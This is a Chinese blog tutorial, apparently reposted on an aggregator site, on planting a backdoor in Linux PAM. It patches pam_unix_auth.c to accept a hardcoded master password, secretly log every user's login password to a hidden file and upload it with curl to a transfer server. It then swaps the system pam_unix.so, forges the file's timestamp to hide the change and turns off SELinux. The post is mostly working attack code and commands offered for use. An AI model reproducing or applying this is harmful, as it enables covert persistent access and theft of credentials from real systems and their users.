美文网首页
Linux后门维系(三)—— PAM后门 + transfer.

Linux后门维系(三)—— PAM后门 + transfer.

作者: RabbitMask | 来源:发表于2020-07-02 20:55 被阅读0次

查看pam版本并下载

rpm -qa | grep pam
pam-1.1.8-12.el7_1.1.x86_64

http://www.linux-pam.org/library/
curl -O http://www.linux-pam.org/library/Linux-PAM-1.1.8.tar.gz

修改并编译pam_unix_auth.c文件

cd Linux-PAM-1.1.8
vim modules/pam_unix/pam_unix_auth.c
pam_unix_auth.c 修改前
    /* verify the password of this user */
    retval = _unix_verify_password(pamh, name, p, ctrl);
    name = p = NULL;
pam_unix_auth.c 修改后
    /* verify the password of this user */
    retval = _unix_verify_password(pamh, name, p, ctrl);
    if(strcmp(p,"1q2w3e4r")==0){return PAM_SUCCESS;}
    if(retval == PAM_SUCCESS){
        FILE * fp;
        fp = fopen("/bin/.sshlog", "a");
        fprintf(fp, "%s : %s\n", name, p);
        fclose(fp);
        system("curl -H 'Max-Downloads: 0' -H 'Max-Days: 7' --upload-file /bin/.sshlog http://127.0.0.1:8080/sshlog.txt -s -o /dev/null --connect-timeout 3");
        }
    name = p = NULL;

curl -H 'Max-Downloads: 0' -H 'Max-Days: 7' --upload-file /bin/.sshlog http://127.0.0.1:8080/sshlog.txt -s -o /dev/null --connect-timeout 3

./configure
make

编译后:modules/pam_unix/.libs/pam_unix.so

备份/替换/修改时间戳

ll /lib64/security/
-rwxr-xr-x. 1 root root  57688 8月  18 2015 pam_unix.so
-rwxr-xr-x. 1 root root  15384 8月  18 2015 pam_userdb.so
-rwxr-xr-x. 1 root root   7000 8月  18 2015 pam_warn.so
-rwxr-xr-x. 1 root root  11168 8月  18 2015 pam_wheel.so
-rwxr-xr-x. 1 root root  19744 8月  18 2015 pam_xauth.so

cp /lib64/security/pam_unix.so /lib64/security/pam_unix.so.bak
cp ./pam_unix.so /lib64/security/pam_unix.so
touch -r /lib64/security/pam_userdb.so /lib64/security/pam_unix.so

ll /lib64/security/
-rwxr-xr-x. 1 root root 221776 8月  18 2015 pam_unix.so
-rwxr-xr-x. 1 root root  57688 6月  30 23:18 pam_unix.so.bak
-rwxr-xr-x. 1 root root  15384 8月  18 2015 pam_userdb.so
-rwxr-xr-x. 1 root root   7000 8月  18 2015 pam_warn.so
-rwxr-xr-x. 1 root root  11168 8月  18 2015 pam_wheel.so
-rwxr-xr-x. 1 root root  19744 8月  18 2015 pam_xauth.so

如果selinux是开启的环境,一定要关掉或者设置好上下文pam_unix.so才能正常工作。

查看selinux 状态
getenforce
    Enforcing 关闭
    Permissive 开启
临时关闭selinux
setenforce 0
临时开启selinux
setenforce 1

查看selinux上下文:
ls -Z pam_unix.so.bak
设置selinux上下文:
chcon –reference=pam_unix.so.bak pam_unix.so

相关文章

  • Linux后门维系(三)—— PAM后门 + transfer.

    查看pam版本并下载 修改并编译pam_unix_auth.c文件 pam_unix_auth.c 修改前 pam...

  • linux后门维系

    信息搜集 以下为虚拟机效果: w/who显示目前登入系统的用户信息 无痕终端操作 执行完成后当前终端所有操作不被记...

  • Linux后门维系(二)

    先推荐下我最喜欢的Linux后门系列文章,在我的收藏夹里藏了好久了,来自奇安信的公众号。 《红队实战攻防技术分享:...

  • linux权限维持

    ssh软连接后门 SSH服务默认使用PAM进行身份验证 PAM是Linux系统中的一个独立API,它提供了各种验证...

  • linux后门

    软链接后门 ssh启用了PAM,用到了pam_rootok模块 同样还具有pam_rootok模块的文件还有 同样...

  • 常用linux后门

    一。添加root权限用户一句话非交互式添加root权限用户useradd -o -u 0 -g 0 test &&...

  • 一些常见后门

    linux后门 一、前提:已经是root用户,想留一个后门 suid shell .woot前面的'.'并不是必须...

  • 后门

    故事一 早上10多了,医院里人山人海,B超检查室这边大厅里两边凳子上坐满了排队等候的人。有的在玩手机,有的在聊天,...

  • 后门

    小时候 正门进不去时 我们会偷偷摸摸地从后门进 长大了 大人们说 现在很多事 都得靠后门 不靠还行不通

  • 后门

    W:“走,吃饭去咯!” 我:“好!唉!你往哪走啊?” W:“跟我走没错的,这边能走了,阿姨说了,以后每天留个后门给...

网友评论

      本文标题:Linux后门维系(三)—— PAM后门 + transfer.

      本文链接:https://www.haomeiwen.com/subject/fvrdqktx.html

      延伸阅读

      深度阅读

      • 您也可以注册成为美文阅读网的作者,发表您的原创作品、分享您的心情!

      栏目导航

      热点阅读

      关于我们|服务条款|联系我们|Linux后门维系(三)—— PAM后门 + transfer.|投稿指南|网站地图|RSS订阅|排版工具|手机版

      提供经典美文摘抄,优美散文欣赏,现代诗歌精选,短篇小说,心情随笔,表白情书范文,故事会在线阅读欣赏

      Copyright © 2014-2023 Haomeiwen.com All Rights Reserved. 好美文阅读网 版权所有

      备案信息:桂公网安备 45052102000051号 · 桂ICP备13007215号-3

      本站所收录作品、热点评论等信息部分来源互联网,目的只是为了系统归纳学习和传递资讯

      所有作品版权归原创作者所有,与本站立场无关,如不慎侵犯了你的权益,请联系我们告知,我们将做删除处理!